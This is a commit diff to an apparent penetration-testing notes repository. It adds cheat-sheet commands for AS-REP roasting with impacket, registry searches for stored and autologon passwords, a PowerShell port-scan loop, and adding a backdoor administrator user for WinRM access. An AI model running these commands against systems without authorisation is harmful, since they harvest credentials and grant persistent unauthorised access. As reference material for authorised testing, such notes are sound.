added windows enumeration details.

Enumeration/AS-REP Roasting.md

@@ -0,0 +1,12 @@
+# AS-Rep Roating
+
+AS-Rep Roasting dumps user accounts which did not enable pre-authentication.
+This is somewhat similar to Kerberoasting but includes user accounts as well.
+
+## Usage
+
+Impacket got `GetNPUsers` to check non pre-authenticated user accounts and find credentials.
+
+```sh
+impacket-GetNPUsers $TARGET_DOMAIN/ -dc-ip $TARGET_DC_IP -usersfile $USERS_FILE  -format hashcat -outputfile hashes.txt -no-pass
+```

Enumeration/Windows/Powershell.md

@@ -1,18 +1,23 @@
 # Powershell Usage
 
 ## Get-Help
+
 ```
-Get-Help Command-Name 
+Get-Help Command-Name
 ```
-* Show examples
+
+Show examples
+
 ```
 Get-Help Command-Name -Examples
 ```
 
-* Get-Command gets all the cmdlets installed on the current Computer. 
+Get-Command gets all the cmdlets installed on the current Computer.
+
 ```
 Get-Command
 ```
+
 ```
 Get-Command Verb-*
 Get-Command Invoke-*
@@ -20,19 +25,23 @@ Get-Command Get-*
 ```
 
 ## Passing Output via Pipe
-* A pipe passes object including methods and attributes.
+
+ A pipe passes object including methods and attributes.
 
 ```
 Verb-Noun | Get-Member
 ```
+
 ```
 Get-Command | Get-Member -MemberType Method
 ```
 
 ## Creating Objects from Previous Cmdlets
+
 ```
 Get-ChildItem | Select-Object -Property Mode, Name
 ```
+
 * first - gets the first x object
 * last - gets the last x object
 * unique - shows the unique objects
@@ -74,7 +83,7 @@ Get-ChildItem | Sort-Object
 ## Finding a File
 ```
 Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
-``` 
+```
 ```sh
 Get-HotFix | Format-list | findstr  <searchstring>
 ```
@@ -111,7 +120,7 @@ Copy-Item <sourcefile> <destfile>
 ## Count Lines of Output
 As an example, count all cmdlets on the system
 ```
-Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object 
+Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object
 ```
 
 ## Count Words
@@ -129,7 +138,7 @@ Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'
 Get-Location
 ```
 
-## File Metadata 
+## File Metadata
 ```sh
 ls | Format-List *
 ```
@@ -216,7 +225,7 @@ driverquery
 
 ### Processes
 * Start processes
-```sh 
+```sh
 Start-Process <process>
 ```
 
@@ -265,7 +274,7 @@ Get-ACL C:\
 ### Port Scanner
 ```
 for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}
-``` 
+```
 
 ### Ping Hosts
 ```sh

Enumeration/Windows/Registry.md

@@ -0,0 +1,9 @@
+# Registry Enumeration
+
+## Usage
+
+Query keys including the string `password` via `reg`.
+
+```sh
+reg query HKLM /f "password" /t REG_SZ /s
+```

Post Exploitation/Windows/Add Users.md

@@ -1,16 +1,61 @@
-# Add user as system user
+# Users
+
+## List Users
+
+List local users
+
+```
+net user
+```
+
+List users of the domain
+
+```
+net user /domain
+```
+
+Get more information about a user
+
+```
+net user Administrator /domain
+```
+
+## List Groups
+
+List local groups
+
+```
+net localgroup
+```
+
+List groups of the domain
+
+```
+net group /domain
+```
+
+Get more information about a group
+
+```
+net group Administrator /domain
+```
+
+## Add user as system user
+
 ```sh
 net user <username> <password> /add
 ```
+
 ```sh
 net localgroup Administrator <username> /add
 ```
+
 ```sh
 net localgroup "Remote Management Users" <username> /add
 ```
+
 ```sh
 net user <username>
 ```
-* connect via winRM
-
 
+connect via winRM afterwards using the new user

Post Exploitation/Windows/Registry.md

@@ -1,7 +1,17 @@
 # Windows Registry
 
 ## AutoLogin Password
-* Automatic logon password is save in plaintext 
+
+Automatic logon password is save in plaintext
+
 ```
 reg query "HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon"
 ```
+
+## Search for Passwords
+
+Use `reg` to search for passwords inside Keys of the registry via the following line.
+
+```
+reg query HKLM /f "password" /t REG_SZ /s
+```